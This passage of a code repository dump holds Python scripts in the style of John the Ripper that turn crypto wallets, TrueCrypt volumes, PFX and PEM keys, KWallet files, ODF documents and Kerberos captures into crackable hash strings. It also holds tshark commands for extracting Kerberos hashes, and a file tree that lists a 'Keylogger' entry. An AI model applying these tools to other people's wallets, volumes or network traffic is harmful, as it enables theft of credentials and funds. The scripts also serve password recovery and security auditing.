├── README.md ├── blockchain2john.py ├── truecrypt2john.py ├── pfx2john.py ├── pem2john.py ├── ethereum2john.py ├── kwallet2john.py ├── odf2john.py ├── krb2john.py ├── electrum2john.py ├── Keylogger ├── bitcoin2john.py └── office2john.py /README.md: -------------------------------------------------------------------------------- 1 | # python 2 | various python scripts 3 | -------------------------------------------------------------------------------- /blockchain2john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import sys 4 | import base64 5 | import binascii 6 | import argparse 7 | import json 8 | import traceback 9 | 10 | if __name__ == '__main__': 11 | 12 | parser = argparse.ArgumentParser( 13 | prog=sys.argv[0], 14 | usage="%(prog)s [blockchain wallet files]") 15 | 16 | parser.add_argument('--json', action='store_true', default=False, 17 | dest='json', help='is the wallet using v2 format?') 18 | parser.add_argument('--base64', action='store_true', default=False, 19 | dest='base64', help='does the wallet contain only a base64 string?') 20 | 21 | args, unknown = parser.parse_known_args() 22 | 23 | if len(sys.argv) < 2: 24 | parser.print_help() 25 | sys.exit(-1) 26 | 27 | for filename in unknown: 28 | with open(filename, "rb") as f: 29 | data = f.read() 30 | # try to detect the wallet format version, https://blockchain.info/wallet/wallet-format 31 | if b"guid" in data and args.json: # v1 32 | sys.stderr.write("My Wallet Version 1 seems to be used, remove --json option!\n") 33 | continue 34 | if b"pbkdf2_iterations" in data and not args.json: # v2/v3 35 | sys.stderr.write("My Wallet Version 2 or 3 seems to be used, adding --json option is required!\n") 36 | continue 37 | 38 | if args.json: 39 | # hack for version 2.0 and 3.0 wallets 40 | try: 41 | decoded_data = json.loads(data.decode("utf-8")) 42 | if "version" in decoded_data and (str(decoded_data["version"]) == "2" or 
str(decoded_data["version"]) == "3"): 43 | payload = base64.b64decode(decoded_data["payload"]) 44 | iterations = decoded_data["pbkdf2_iterations"] 45 | print("%s:$blockchain$v2$%s$%s$%s" % ( 46 | filename, iterations, len(payload), 47 | binascii.hexlify(payload).decode(("ascii")))) 48 | except: 49 | traceback.print_exc() 50 | pass 51 | 52 | if args.base64: 53 | # handle blockchain version 1 wallet format files which contain 54 | # only a base64 encoded string 55 | try: 56 | ddata = base64.decodestring(data) 57 | print("%s:$blockchain$%s$%s" % ( 58 | filename, len(ddata), 59 | binascii.hexlify(ddata).decode("ascii"))) 60 | except: 61 | pass 62 | 63 | if not (args.json or args.base64): # version 1 wallet format 64 | print("%s:$blockchain$%s$%s" % ( 65 | filename, len(data), 66 | binascii.hexlify(data).decode("ascii"))) 67 | -------------------------------------------------------------------------------- /truecrypt2john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # TrueCrypt volume importion to a format usable by John The Ripper 4 | # 5 | # Written by Alain Espinosa in 2012. No copyright 6 | # is claimed, and the software is hereby placed in the public domain. 7 | # In case this attempt to disclaim copyright and place the software in the 8 | # public domain is deemed null and void, then the software is 9 | # Copyright (c) 2012 Alain Espinosa and it is hereby released to the 10 | # general public under the following terms: 11 | # 12 | # Redistribution and use in source and binary forms, with or without 13 | # modification, are permitted. 14 | # 15 | # There's ABSOLUTELY NO WARRANTY, express or implied. 16 | # 17 | # (This is a heavily cut-down "BSD license".) 
18 | # 19 | # Ported to Python by Dhiru Kholia, in June of 2015 20 | 21 | import sys 22 | from os.path import basename 23 | import binascii 24 | import optparse 25 | 26 | 27 | def process_file(filename, keyfiles, options): 28 | try: 29 | f = open(filename, "rb") 30 | except Exception as e: 31 | sys.stderr.write("%s : No truecrypt volume found? %s\n" % str(e)) 32 | return 33 | 34 | header = f.read(512) # encrypted header of the volume 35 | if len(header) != 512: 36 | f.close() 37 | sys.stderr.write("%s : Truecrypt volume file to short: Need at least 512 bytes\n", filename) 38 | return 39 | 40 | if options.boot_mode: 41 | tags = ["truecrypt_RIPEMD_160_BOOT"] 42 | else: 43 | tags = ["truecrypt_RIPEMD_160", "truecrypt_SHA_512", "truecrypt_WHIRLPOOL"] 44 | 45 | for tag in tags: 46 | sys.stdout.write("%s:%s$" % (basename(filename), tag)) 47 | sys.stdout.write(binascii.hexlify(header)) 48 | if keyfiles: 49 | nkeyfiles = len(keyfiles) 50 | sys.stdout.write("$%d" % (nkeyfiles)) 51 | for keyfile in keyfiles: 52 | sys.stdout.write("$%s" % keyfile) 53 | sys.stdout.write(":normal::::%s\n" % filename) 54 | 55 | # try hidden volume if any 56 | f.seek(65536, 0) 57 | if f.tell() != 65536: 58 | f.close() 59 | return 60 | header = f.read(512) 61 | if len(header) != 512: 62 | f.close() 63 | return 64 | 65 | for tag in ["truecrypt_RIPEMD_160", "truecrypt_SHA_512", "truecrypt_WHIRLPOOL"]: 66 | sys.stdout.write("%s:%s$" % (basename(filename), tag)) 67 | sys.stdout.write(binascii.hexlify(header)) 68 | if keyfiles: 69 | nkeyfiles = len(keyfiles) 70 | sys.stdout.write("$%d" % (nkeyfiles)) 71 | for keyfile in keyfiles: 72 | sys.stdout.write("$%s" % keyfile) 73 | sys.stdout.write(":hidden::::%s\n" % filename) 74 | 75 | f.close() 76 | 77 | if __name__ == "__main__": 78 | if len(sys.argv) < 2: 79 | sys.stderr.write("Utility to import TrueCrypt volume to a format crackeable by John The Ripper\n") 80 | sys.stderr.write("\nUsage: %s [-b] volume_filename [keyfiles(s)]> output_file\n" % sys.argv[0]) 
81 | sys.stderr.write("\nEnable -b only when attacking TrueCrypt's boot mode.\n") 82 | sys.stderr.write("\nError: No truecrypt volume file specified.\n") 83 | sys.exit(-1) 84 | 85 | parser = optparse.OptionParser() 86 | parser.add_option('-b', action="store_true", default=False, dest="boot_mode") 87 | options, remainder = parser.parse_args() 88 | 89 | keyfiles = [] 90 | if len(remainder) > 2: 91 | keyfiles = remainder[1:] 92 | 93 | process_file(remainder[0], keyfiles, options) 94 | -------------------------------------------------------------------------------- /pfx2john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding: utf-8 3 | 4 | """ 5 | Modified for JtR by Dhiru Kholia in July, 2016 6 | 7 | Copyright (c) 2015 Will Bond 8 | 9 | Permission is hereby granted, free of charge, to any person obtaining a copy of 10 | this software and associated documentation files (the "Software"), to deal in 11 | the Software without restriction, including without limitation the rights to 12 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies 13 | of the Software, and to permit persons to whom the Software is furnished to do 14 | so, subject to the following conditions: 15 | 16 | The above copyright notice and this permission notice shall be included in all 17 | copies or substantial portions of the Software. 18 | 19 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 20 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 21 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 22 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 23 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 24 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 25 | SOFTWARE. 
26 | """ 27 | 28 | import binascii 29 | import sys 30 | try: 31 | from asn1crypto import pkcs12 32 | except ImportError: 33 | sys.stderr.write("asn1crypto is missing, run 'pip install --user asn1crypto' to install it!\n") 34 | sys.exit(-1) 35 | import os 36 | 37 | 38 | def parse_pkcs12(filename): 39 | data = open(filename, "rb").read() 40 | pfx = pkcs12.Pfx.load(data) 41 | 42 | auth_safe = pfx['auth_safe'] 43 | if auth_safe['content_type'].native != 'data': 44 | raise ValueError( 45 | ''' 46 | Only password-protected PKCS12 files are currently supported 47 | ''' 48 | ) 49 | 50 | mac_data = pfx['mac_data'] 51 | if mac_data: 52 | mac_algo = mac_data['mac']['digest_algorithm']['algorithm'].native 53 | key_length = { 54 | 'sha1': 20, 55 | 'sha224': 28, 56 | 'sha256': 32, 57 | 'sha384': 48, 58 | 'sha512': 64, 59 | 'sha512_224': 28, 60 | 'sha512_256': 32, 61 | }[mac_algo] 62 | 63 | salt = mac_data['mac_salt'].native 64 | iterations = mac_data['iterations'].native 65 | mac_algo_numeric = -1 66 | if mac_algo == "sha1": 67 | mac_algo_numeric = 1 68 | elif mac_algo == "sha224": 69 | mac_algo_numeric = 224 70 | elif mac_algo == "sha256": 71 | mac_algo_numeric = 256 72 | elif mac_algo == "sha384": 73 | mac_algo_numeric = 384 74 | elif mac_algo == "sha512": 75 | mac_algo_numeric = 512 76 | else: 77 | sys.stderr.write("mac_algo %s is not supported yet!\n" % mac_algo) 78 | return 79 | stored_hmac = mac_data['mac']['digest'].native 80 | data = auth_safe['content'].contents 81 | size = len(salt) 82 | sys.stdout.write("%s:$pfxng$%s$%s$%s$%s$%s$%s$%s:::::%s\n" % 83 | (os.path.basename(filename), mac_algo_numeric, 84 | key_length, iterations, size, binascii.hexlify(salt), 85 | binascii.hexlify(data), 86 | binascii.hexlify(stored_hmac), filename)) 87 | 88 | 89 | if __name__ == "__main__": 90 | if len(sys.argv) < 2: 91 | sys.stderr.write("Usage: %s <.pfx file(s)>\n" % sys.argv[0]) 92 | 93 | for i in range(1, len(sys.argv)): 94 | parse_pkcs12(sys.argv[1]) 95 | 
-------------------------------------------------------------------------------- /pem2john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding: utf-8 3 | 4 | # Copyright (C) 2015, Dhiru Kholia 5 | # 6 | # Shouldn't this be called pkcs8tojohn.py instead? 7 | 8 | import sys 9 | import traceback 10 | 11 | try: 12 | from asn1crypto import pem 13 | from asn1crypto.keys import EncryptedPrivateKeyInfo 14 | except ImportError: 15 | sys.stderr.write("asn1crypto python package is missing, please install it using 'pip install asn1crypto' command.\n") 16 | # traceback.print_exc() 17 | sys.exit(-1) 18 | 19 | """ 20 | 21 | https://www.ietf.org/rfc/rfc5208.txt 22 | 23 | http://lapo.it/asn1js/ 24 | 25 | https://github.com/bwall/pemcracker/blob/master/test.pem 26 | 27 | $ openssl asn1parse -in test.pem 28 | 0:d=0 hl=4 l= 710 cons: SEQUENCE 29 | 4:d=1 hl=2 l= 64 cons: SEQUENCE 30 | 6:d=2 hl=2 l= 9 prim: OBJECT :PBES2 31 | 17:d=2 hl=2 l= 51 cons: SEQUENCE 32 | 19:d=3 hl=2 l= 27 cons: SEQUENCE 33 | 21:d=4 hl=2 l= 9 prim: OBJECT :PBKDF2 34 | 32:d=4 hl=2 l= 14 cons: SEQUENCE 35 | 34:d=5 hl=2 l= 8 prim: OCTET STRING [HEX DUMP]:0C71E1C801194282 36 | 44:d=5 hl=2 l= 2 prim: INTEGER :0800 37 | 48:d=3 hl=2 l= 20 cons: SEQUENCE 38 | 50:d=4 hl=2 l= 8 prim: OBJECT :des-ede3-cbc 39 | 60:d=4 hl=2 l= 8 prim: OCTET STRING [HEX DUMP]:87120F8C098437D0 40 | 70:d=1 hl=4 l= 640 prim: OCTET STRING [HEX DUMP]:C4BC6BC5447BED58... 
41 | """ 42 | 43 | 44 | def unwrap_pkcs8(blob): 45 | if not pem.detect(blob): 46 | return 47 | 48 | _, _, der_bytes = pem.unarmor(blob) 49 | data = EncryptedPrivateKeyInfo.load(der_bytes).native 50 | 51 | if "encryption_algorithm" not in data: 52 | return 53 | if "encrypted_data" not in data: 54 | return 55 | if "algorithm" not in data["encryption_algorithm"]: 56 | return 57 | if data["encryption_algorithm"]["algorithm"] != "pbes2": 58 | sys.stderr.write("[%s] encryption_algorithm <%s> is not supported currently!\n" % 59 | (sys.argv[0], data["encryption_algorithm"]["algorithm"])) 60 | return 61 | 62 | # encryption data 63 | encrypted_data = data["encrypted_data"] 64 | 65 | # KDF 66 | params = data["encryption_algorithm"]["parameters"] 67 | kdf = params["key_derivation_func"] 68 | if kdf["algorithm"] != "pbkdf2": 69 | sys.stderr.write("[%s] kdf algorithm <%s> is not supported currently!\n" % 70 | (sys.argv[0], kdf["algorithm"])) 71 | return 72 | kdf_params = kdf["parameters"] 73 | salt = kdf_params["salt"] 74 | iterations = kdf_params["iteration_count"] 75 | 76 | # Cipher 77 | cipher_params = params["encryption_scheme"] 78 | cipher = cipher_params["algorithm"] 79 | iv = cipher_params["parameters"] 80 | 81 | if cipher != "tripledes_3key": 82 | sys.stderr.write("[%s] cipher <%s> is not supported currently!\n" % (sys.argv[0], cipher)) 83 | return 84 | 85 | sys.stdout.write("$PEM$1$1$%s$%s$%s$%d$%s\n" % (salt.encode("hex"), iterations, iv.encode("hex"), len(encrypted_data), encrypted_data.encode("hex"))) 86 | 87 | 88 | if __name__ == "__main__": 89 | 90 | if len(sys.argv) < 2: 91 | sys.stdout.write("Usage: %s <.pem files using PCKS #8 format>\n" % 92 | sys.argv[0]) 93 | 94 | for filename in sys.argv[1:]: 95 | blob = open(filename, "rb").read() 96 | if b'-----BEGIN ENCRYPTED PRIVATE KEY-----' not in blob: 97 | if b'PRIVATE KEY-----' in blob: 98 | sys.stderr.write("[%s] try using sshng2john.py on this file instead!\n" % sys.argv[0]) 99 | else: 100 | sys.stderr.write("[%s] 
is this really a private key in PKCS #8 format?\n" % sys.argv[0]) 101 | 102 | continue 103 | 104 | unwrap_pkcs8(blob) 105 | -------------------------------------------------------------------------------- /ethereum2john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # This software is Copyright (c) 2017, Dhiru Kholia 4 | # and it is hereby released to the general public under the following terms: 5 | # 6 | # Redistribution and use in source and binary forms, with or without 7 | # modification, are permitted. 8 | # 9 | # Special thanks goes to @Chick3nman for coming up with the output hash format. 10 | # 11 | # References, 12 | # 13 | # https://github.com/ethereum/wiki/wiki/Web3-Secret-Storage-Definition 14 | # 15 | # https://github.com/ethereum/go-ethereum/wiki/Passphrase-protected-key-store-spec, 16 | # v1 wallets are not supported (yet) 17 | 18 | import os 19 | import sys 20 | import traceback 21 | 22 | try: 23 | import json 24 | assert json 25 | except ImportError: 26 | try: 27 | sys.path.append(".") 28 | import simplejson as json 29 | except ImportError: 30 | sys.stderr.write("Please install json / simplejson module which is currently not installed.\n") 31 | sys.exit(-1) 32 | 33 | 34 | def process_presale_wallet(filename, data): 35 | try: 36 | bkp = data["bkp"] 37 | except KeyError: 38 | sys.stdout.write("%s: presale wallet is missing 'bkp' field, this is unsupported!\n" % filename) 39 | return 40 | 41 | try: 42 | encseed = data["encseed"] 43 | ethaddr = data["ethaddr"] 44 | except KeyError: 45 | sys.stdout.write("%s: presale wallet is missing necessary fields!\n" % filename) 46 | return 47 | 48 | # 16 bytes of bkp should be enough 49 | sys.stdout.write("%s:$ethereum$w*%s*%s*%s\n" % 50 | (os.path.basename(filename), encseed, ethaddr, bkp[:32])) 51 | 52 | 53 | def process_file(filename): 54 | try: 55 | f = open(filename, "rb") 56 | except IOError: 57 | e = sys.exc_info()[1] 58 | 
sys.stderr.write("%s\n" % str(e)) 59 | return 60 | 61 | data = f.read().decode("utf-8") 62 | try: 63 | data = json.loads(data) 64 | try: 65 | crypto = data["crypto"] 66 | except KeyError: 67 | try: 68 | crypto = data["Crypto"] 69 | except: # hack for presale wallet 70 | process_presale_wallet(filename, data) 71 | return 72 | cipher = crypto["cipher"] 73 | if cipher != "aes-128-ctr": 74 | sys.stdout.write("%s: unexpected cipher '%s' found\n" % (filename, cipher)) 75 | return -2 76 | kdf = crypto["kdf"] 77 | ciphertext = crypto["ciphertext"] 78 | mac = crypto["mac"] 79 | if kdf == "scrypt": 80 | kdfparams = crypto["kdfparams"] 81 | n = kdfparams["n"] 82 | r = kdfparams["r"] 83 | p = kdfparams["p"] 84 | salt = kdfparams["salt"] 85 | sys.stdout.write("%s:$ethereum$s*%s*%s*%s*%s*%s*%s\n" % 86 | (os.path.basename(filename), n, r, p, salt, 87 | ciphertext, mac)) 88 | elif kdf == "pbkdf2": 89 | kdfparams = crypto["kdfparams"] 90 | n = kdfparams["c"] 91 | prf = kdfparams["prf"] 92 | if prf != 'hmac-sha256': 93 | sys.stdout.write("%s: unexpected prf '%s' found\n" % (filename, prf)) 94 | return 95 | salt = kdfparams["salt"] 96 | sys.stdout.write("%s:$ethereum$p*%s*%s*%s*%s\n" % 97 | (os.path.basename(filename), n, salt, 98 | ciphertext, mac)) 99 | else: 100 | assert 0 101 | except: 102 | sys.stdout.write("%s: json parsing failed\n" % filename) 103 | traceback.print_exc() 104 | return -1 105 | 106 | f.close() 107 | 108 | 109 | if __name__ == "__main__": 110 | if len(sys.argv) < 2: 111 | sys.stderr.write("Usage: %s [Ethereum Wallet files (Geth/Mist/MyEtherWallet)]\n" % sys.argv[0]) 112 | sys.exit(-1) 113 | 114 | for j in range(1, len(sys.argv)): 115 | process_file(sys.argv[j]) 116 | -------------------------------------------------------------------------------- /kwallet2john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # This software is Copyright (c) 2014, Sanju Kholia 4 | # and it is hereby released to 
the general public under the following terms: 5 | # 6 | # Redistribution and use in source and binary forms, with or without 7 | # modification, are permitted. 8 | # 9 | # "kde-runtime/kwalletd/backend/kwalletbackend.cc" file is authoritative. 10 | # 11 | # Use gdb -p `pidof kwalletd5` and "break gcry_kdf_derive" to debug this code. 12 | 13 | import sys 14 | import os 15 | import struct 16 | from binascii import hexlify 17 | 18 | KWMAGIC = "KWALLET\n\r\0\r\n" 19 | KWMAGIC_LEN = 12 20 | KWALLET_VERSION_MAJOR = 0 21 | KWALLET_VERSION_MINOR = 0 22 | KWALLET_CIPHER_BLOWFISH_ECB = 0 # this was the old KWALLET_CIPHER_BLOWFISH_CBC 23 | KWALLET_CIPHER_3DES_CBC = 1 24 | KWALLET_CIPHER_GPG = 2 25 | KWALLET_CIPHER_BLOWFISH_CBC = 3 26 | KWALLET_HASH_SHA1 = 0 27 | KWALLET_HASH_MD5 = 1 # unsupported (even upstream) 28 | KWALLET_HASH_PBKDF2_SHA512 = 2 # used when using kwallet with pam or since 4.13 version 29 | N = 128 30 | 31 | PBKDF2_SHA512_KEYSIZE = 56 32 | PBKDF2_SHA512_SALTSIZE = 56 33 | PBKDF2_SHA512_ITERATIONS = 50000 34 | 35 | 36 | def process_file(filename): 37 | offset = 0 38 | new_version = False # PBKDF2-HMAC-SHA512 if True 39 | kwallet_minor_version = -1 40 | 41 | try: 42 | fd = open(filename, "rb") 43 | except IOError: 44 | e = sys.exc_info()[1] 45 | sys.stderr.write("%s\n" % str(e)) 46 | return 47 | 48 | # TOCTOU but who cares, right? 
;) 49 | size = os.stat(filename).st_size 50 | buf = fd.read(KWMAGIC_LEN) 51 | 52 | if buf != KWMAGIC: 53 | sys.stderr.write("%s : Not a KDE KWallet file!\n" % filename) 54 | return 55 | offset += KWMAGIC_LEN 56 | buf = bytearray(fd.read(4)) 57 | offset += 4 58 | 59 | # First byte is major version, second byte is minor version 60 | if buf[0] != KWALLET_VERSION_MAJOR: 61 | sys.stderr.write("%s : Unknown major version!\n" % filename) 62 | return 63 | # 0 has been the MINOR version until 4.13, from that point we use it to 64 | # upgrade the hash 65 | # 66 | # See runtime/kwalletd/backend/backendpersisthandler.cpp for details 67 | if buf[1] != 0: # Old KWALLET_VERSION_MINOR 68 | if buf[1] != 1: # New KWALLET_VERSION_MINOR 69 | sys.stderr.write("%s : Unknown minor version!\n" % filename) 70 | return 71 | new_version = True 72 | kwallet_minor_version = buf[1] 73 | if buf[2] != KWALLET_CIPHER_BLOWFISH_ECB and buf[2] != KWALLET_CIPHER_BLOWFISH_CBC: 74 | sys.stderr.write("%s : Unsupported cipher <%d>\n" % (filename, buf[2])) 75 | return 76 | if buf[3] != KWALLET_HASH_SHA1 and buf[3] != KWALLET_HASH_PBKDF2_SHA512: 77 | sys.stderr.write("%s : Unsupported hash <%d>\n" % (filename, buf[3])) 78 | return 79 | 80 | # Read in the hashes 81 | buf = fd.read(4) 82 | n = struct.unpack("> I", buf)[0] 83 | if n > 0xffff: 84 | sys.stderr.write("%s : sanity check failed!\n" % filename) 85 | sys.exit(6) 86 | offset += 4 87 | for i in range(0, n): 88 | buf = fd.read(16) 89 | offset += 16 90 | buf = fd.read(4) # read 4 bytes more 91 | fsz = struct.unpack("> I", buf)[0] 92 | offset += 4 93 | for j in range(0, fsz): 94 | fd.read(16) 95 | offset += 16 96 | 97 | # Read in the rest of the file 98 | encrypted_size = size - offset 99 | encrypted = fd.read(encrypted_size) 100 | encrypted_size = len(encrypted) 101 | 102 | if encrypted_size % 8 != 0: 103 | sys.stderr.write("%s : invalid file structure!\n", filename) 104 | sys.exit(7) 105 | 106 | if new_version: 107 | # read salt 108 | salt_filename = 
os.path.splitext(filename)[0] + ".salt" 109 | try: 110 | salt = open(salt_filename).read() 111 | except: 112 | sys.stderr.write("%s : unable to read salt from %s\n" % (filename, salt_filename)) 113 | sys.exit(8) 114 | salt_len = len(salt) 115 | iterations = PBKDF2_SHA512_ITERATIONS # is this fixed? 116 | sys.stdout.write("%s:$kwallet$%ld$%s$%d$%d$%s$%s" % 117 | (os.path.basename(filename), encrypted_size, 118 | hexlify(encrypted), kwallet_minor_version, salt_len, 119 | salt.encode("hex"), iterations)) 120 | sys.stdout.write(":::::%s\n" % filename) 121 | else: 122 | sys.stdout.write("%s:$kwallet$%ld$%s" % (os.path.basename(filename), encrypted_size, hexlify(encrypted))) 123 | sys.stdout.write(":::::%s\n" % filename) 124 | 125 | fd.close() 126 | 127 | if __name__ == "__main__": 128 | if len(sys.argv) < 2: 129 | sys.stderr.write("Usage: %s <.kwl file(s)>\n" % sys.argv[0]) 130 | sys.exit(-1) 131 | 132 | for i in range(1, len(sys.argv)): 133 | process_file(sys.argv[i]) 134 | -------------------------------------------------------------------------------- /odf2john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """odf2john.py processes ODF files into a format suitable 4 | for use with JtR. 
5 | 6 | Output Format: 7 | 8 | filename:$odf*cipher type*checksum type*iterations*key-size*checksum* 9 | iv length*iv*salt length*salt*inline or not*content.xml or its path""" 10 | 11 | from xml.etree.ElementTree import ElementTree 12 | import zipfile 13 | import sys 14 | import base64 15 | import binascii 16 | import os 17 | 18 | 19 | def process_file(filename): 20 | try: 21 | zf = zipfile.ZipFile(filename) 22 | except zipfile.BadZipfile: 23 | sys.stderr.write("%s is not an OpenOffice file!\n" % filename) 24 | return 2 25 | try: 26 | mf = zf.open("META-INF/manifest.xml") 27 | except KeyError: 28 | sys.stderr.write("%s is not an OpenOffice file!\n" % filename) 29 | return 3 30 | tree = ElementTree() 31 | tree.parse(mf) 32 | r = tree.getroot() 33 | 34 | # getiterator() is deprecated but 2.6 does not have iter() 35 | try: 36 | elements = list(r.iter()) 37 | except: 38 | elements = list(r.getiterator()) 39 | 40 | is_encrypted = False 41 | key_size = 16 42 | for i in range(0, len(elements)): 43 | element = elements[i] 44 | if element.get("{urn:oasis:names:tc:opendocument:xmlns:manifest:1.0}full-path") == "content.xml": 45 | for j in range(i + 1, i + 1 + 3): 46 | element = elements[j] 47 | # print element.items() 48 | data = element.get("{urn:oasis:names:tc:opendocument:xmlns:manifest:1.0}checksum") 49 | if data: 50 | is_encrypted = True 51 | checksum = data 52 | data = element.get("{urn:oasis:names:tc:opendocument:xmlns:manifest:1.0}checksum-type") 53 | if data: 54 | checksum_type = data 55 | data = element.get("{urn:oasis:names:tc:opendocument:xmlns:manifest:1.0}initialisation-vector") 56 | if data: 57 | iv = data 58 | data = element.get("{urn:oasis:names:tc:opendocument:xmlns:manifest:1.0}salt") 59 | if data: 60 | salt = data 61 | data = element.get("{urn:oasis:names:tc:opendocument:xmlns:manifest:1.0}algorithm-name") 62 | if data: 63 | algorithm_name = data 64 | data = element.get("{urn:oasis:names:tc:opendocument:xmlns:manifest:1.0}iteration-count") 65 | if data: 
66 | iteration_count = data 67 | data = element.get("{urn:oasis:names:tc:opendocument:xmlns:manifest:1.0}key-size") 68 | if data: 69 | key_size = data 70 | 71 | if not is_encrypted: 72 | sys.stderr.write("%s is not an encrypted OpenOffice file!\n" % filename) 73 | return 4 74 | 75 | checksum = base64.decodestring(checksum.encode()) 76 | checksum = binascii.hexlify(checksum).decode("ascii") 77 | iv = binascii.hexlify(base64.decodestring(iv.encode())).decode("ascii") 78 | salt = binascii.hexlify(base64.decodestring(salt.encode())).decode("ascii") 79 | 80 | try: 81 | content = zf.open("content.xml").read(1024) 82 | except KeyError: 83 | sys.stderr.write("%s is not an encrypted OpenOffice file, " \ 84 | "content.xml missing!\n" % filename) 85 | return 5 86 | 87 | if algorithm_name.find("Blowfish CFB") > -1: 88 | algorithm_type = 0 89 | elif algorithm_name.find("aes256-cbc") > -1: 90 | algorithm_type = 1 91 | else: 92 | sys.stderr.write("%s uses un-supported encryption!\n" % filename) 93 | return 6 94 | 95 | if checksum_type.upper().find("SHA1") > -1: 96 | checksum_type = 0 97 | elif checksum_type.upper().find("SHA256") > -1: 98 | checksum_type = 1 99 | else: 100 | sys.stderr.write("%s uses un-supported checksum algorithm!\n" % \ 101 | filename) 102 | return 7 103 | 104 | meta_data_available = True 105 | gecos = "" 106 | try: 107 | meta = zf.open("meta.xml") 108 | meta_tree = ElementTree() 109 | meta_tree.parse(meta) 110 | meta_r = meta_tree.getroot() 111 | for office_meta in meta_r: 112 | for child in office_meta: 113 | if "subject" in child.tag: 114 | gecos += child.text 115 | elif "keyword" in child.tag: 116 | gecos += child.text 117 | elif "title" in child.tag: 118 | gecos += child.text 119 | elif "description" in child.tag: 120 | gecos += child.text 121 | gecos = gecos.replace("\n","").replace("\r","").replace(":","") 122 | except: 123 | meta_data_available = False 124 | 125 | if meta_data_available: 126 | 
sys.stdout.write("%s:$odf$*%s*%s*%s*%s*%s*%d*%s*%d*%s*%d*%s:::%s::%s\n" % \ 127 | (os.path.basename(filename), algorithm_type, checksum_type, 128 | iteration_count, key_size, checksum, len(iv) / 2, iv, 129 | len(salt) / 2, salt, 0, binascii.hexlify(content).decode("ascii"), 130 | gecos, filename)) 131 | else: 132 | sys.stdout.write("%s:$odf$*%s*%s*%s*%s*%s*%d*%s*%d*%s*%d*%s:::::%s\n" % \ 133 | (os.path.basename(filename), algorithm_type, checksum_type, 134 | iteration_count, key_size, checksum, len(iv) / 2, iv, 135 | len(salt) / 2, salt, 0, binascii.hexlify(content).decode("ascii"), 136 | filename)) 137 | 138 | if __name__ == "__main__": 139 | if len(sys.argv) < 2: 140 | sys.stderr.write("Usage: %s \n" % sys.argv[0]) 141 | sys.exit(-1) 142 | 143 | for k in range(1, len(sys.argv)): 144 | process_file(sys.argv[k]) 145 | -------------------------------------------------------------------------------- /krb2john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | # This file was named krbpa2john.py previously. 4 | # 5 | # http://anonsvn.wireshark.org/wireshark/trunk/doc/README.xml-output 6 | # 7 | # For extracting "AS-REQ (krb-as-req)" hashes, 8 | # tshark -r AD-capture-2.pcapng -T pdml > data.pdml 9 | # tshark -2 -r test.pcap -R "tcp.dstport==88 or udp.dstport==88" -T pdml >> data.pdml 10 | # ./run/krb2john.py data.pdml 11 | # 12 | # For extracting "TGS-REP (krb-tgs-rep)" hashes, 13 | # tshark -2 -r test.pcap -R "tcp.srcport==88 or udp.srcport==88" -T pdml >> data.pdml 14 | # ./run/krb2john.py data.pdml 15 | # 16 | # Tested on Ubuntu 14.04.2 LTS (Trusty Tahr), and Fedora 25. 17 | # 18 | # $ tshark -v 19 | # TShark 1.10.6 (v1.10.6 from master-1.10) 20 | # 21 | # August 2017 update -> Extracts AS-REP hashes too. Crack such hashes with 22 | # krb5asrep format. 23 | # 24 | # October 2017 update -> Extracts TGS-REP hashes too. Crack such hashes with 25 | # krb5tgs format. 
26 | 27 | 28 | import sys 29 | try: 30 | from lxml import etree 31 | except ImportError: 32 | sys.stderr.write("This program needs lxml libraries to run. Please install the python-lxml package.\n") 33 | sys.exit(1) 34 | import binascii 35 | 36 | 37 | def process_file(f): 38 | 39 | xmlData = etree.parse(f) 40 | 41 | messages = [e for e in xmlData.xpath('/pdml/packet/proto[@name="kerberos"]')] 42 | PA_DATA_ENC_TIMESTAMP = None 43 | etype = None 44 | user = '' 45 | salt = '' 46 | realm = None 47 | 48 | for msg in messages: # msg is of type "proto" 49 | r = msg.xpath('.//field[@name="kerberos.msg_type"]') or msg.xpath('.//field[@name="kerberos.msg.type"]') 50 | if not r: 51 | continue 52 | if isinstance(r, list): 53 | r = r[0] 54 | message_type = r.attrib["show"] 55 | 56 | # "kerberos.etype_info2.salt" value (salt) needs to be extracted 57 | # from a different packet when etype is 17 or 18! 58 | # if salt is empty, realm.user is used instead (in krb5pa-sha1_fmt_plug.c) 59 | if message_type == "30": # KRB-ERROR 60 | r = msg.xpath('.//field[@name="kerberos.etype_info2.salt"]') or msg.xpath('.//field[@name="kerberos.salt"]') or msg.xpath('.//field[@name="kerberos.etype_info.salt"]') 61 | if r: 62 | if isinstance(r, list): 63 | # some of the entries might have "value" missing! 
